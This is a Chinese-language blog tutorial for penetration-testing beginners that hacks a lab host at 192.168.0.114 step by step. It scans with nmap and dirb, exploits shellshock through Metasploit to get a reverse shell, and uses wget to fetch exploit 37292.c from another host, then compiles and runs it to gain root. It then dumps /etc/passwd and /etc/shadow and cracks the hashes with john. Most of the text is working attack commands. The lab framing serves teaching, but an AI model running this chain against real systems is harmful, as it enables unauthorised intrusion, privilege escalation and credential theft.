相关阅读
视频讲解
图文讲解
初学者可以参考的渗透测试三大步骤
- 扫描设备/服务
- 寻找脆弱性/漏洞
- 进行POST请求测试/使用EXP进行漏洞利用
![图片[1]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220323034516255.webp)
那么扫描设备/服务,这里主要使用到的就是Nmap,我们之前在信息主动收集里有详细讲解过
视频中使用的命令主要是扫描设备的服务-sV
和操作系统的版本号-O
,要扫码全端口使用-p
指定端口范围
sudo nmap 192.168.0.114 -sV -O -p1-65535
![图片[2]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220323035247463.webp)
然后静等一会儿就可以看到扫描结果了
![图片[3]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220323035328397.webp)
然后,我们就可以尝试寻找漏洞了,今天我们主要利用的Apache
的漏洞,做完了端口和服务的扫描,我们可以进行目录扫描,接下来使用的是dirb
工具
dirb http://192.168.0.114
然后我们发现了cgi-bin这个路径,我们尝试进行漏洞的挖掘
![图片[4]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220323043540968-1024x557-1.webp)
![图片[5]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220323043635580-1024x542-1.webp)
我们这里使用metasploit渗透测试框架,输入
sudo msfconsole
然后寻找对应的模块
search shellshock
![图片[6]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220323043745181-1024x382-1.webp)
我们这里要使用的是第一个
use 1
![图片[7]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220323043831206-1024x519-1.webp)
然后设置好相关的选项RHOSTS
、RPATH
、TARGETURI
set RHOSTS 192.168.0.114
set RPATH /bin
set TARGETURI /cgi-bin/hello_world.sh
![图片[8]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220323043915904-1024x127-1.webp)
然后进行执行
exploit
![图片[9]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220323044116745-1024x295-1.webp)
我们发现出现session会话的出现,代表反弹shell已经连接成功
![图片[10]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220323044031870-1024x535-1.webp)
那现在相当于我们已经托管了这台服务器的终端,我们可以输入命令,譬如sysinfo
来查看系统信息、whoami
来查看用户身份
![图片[11]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220323044254695-1024x372-1.webp)
这里我们发现我们没有获得root权限,因此无法查看存储的密码情况,这时我们需要研究如何提升权限,我们可以通过wget
或者curl
命令下载恶意脚本来完成权限提升,这里使用的是下面命令来下载37292.c
恶意提权的c语言文件(该文件代码可以在这里查看,参考https://github.com/offensive-security/exploitdb/blob/master/exploits/linux/local/37292.c)
wget http://192.168.0.192/37292.c
![图片[12]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220323044420351-1024x644-1.webp)
然后使用gcc
进行编译,生成ofs
文件
gcc 37292.c -o ofs
然后给予可以执行权限,并运行
chmod +x ofs
./ofs
![图片[13]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220323044547464.webp)
这时我们继续输入whoami
,可以看到奇迹发生了,我们已经成为root管理员了
![图片[14]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220323044637991-1024x535-1.webp)
然后,我们只需要输入
cat /etc/passwd
cat /etc/shadow
就可以查看加密的密码了,我们可以将其复制保存到passwd
、shadow
文件中(文件名字你也可以叫别的),然后就可以进行离线破解了,我们之前提到的hashcat
可以破解,这里使用的是john
,我们也讲解一下
这里需要先将我们之前存储的passwd
和shadow
文件合并在一起,生成unshadowed.txt
unshadow passwd shadow > unshadowed.txt
使用我们的字典对其进行破解,还原其中的用户名和密码
john --wordlist=/usr/share/wordlist/rockyou.txt unshadowed.txt
输入下面命令可以查看结果
john --show unshadowed.txt
![图片[15]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220323045322916-1024x556-1.webp)
这里我们发现获得了用户名和密码均为vagrant
的用户,这时,我们可以尝试通过ssh看看能不能访问到服务器!
总结一下,如果我们入侵成功了。
需要寻找是否存在FTP、SSH、web页面可供我们连接。
同时,我们还需要尝试看看能不能提权拿到root管理员权限
![图片[16]-【视频讲解】渗透测试初学者应掌握的常用技巧和思路-FancyPig's blog](https://www.cvv-goods.com/wp-content/uploads/2023/03/20220323034745858.webp)
暂无评论内容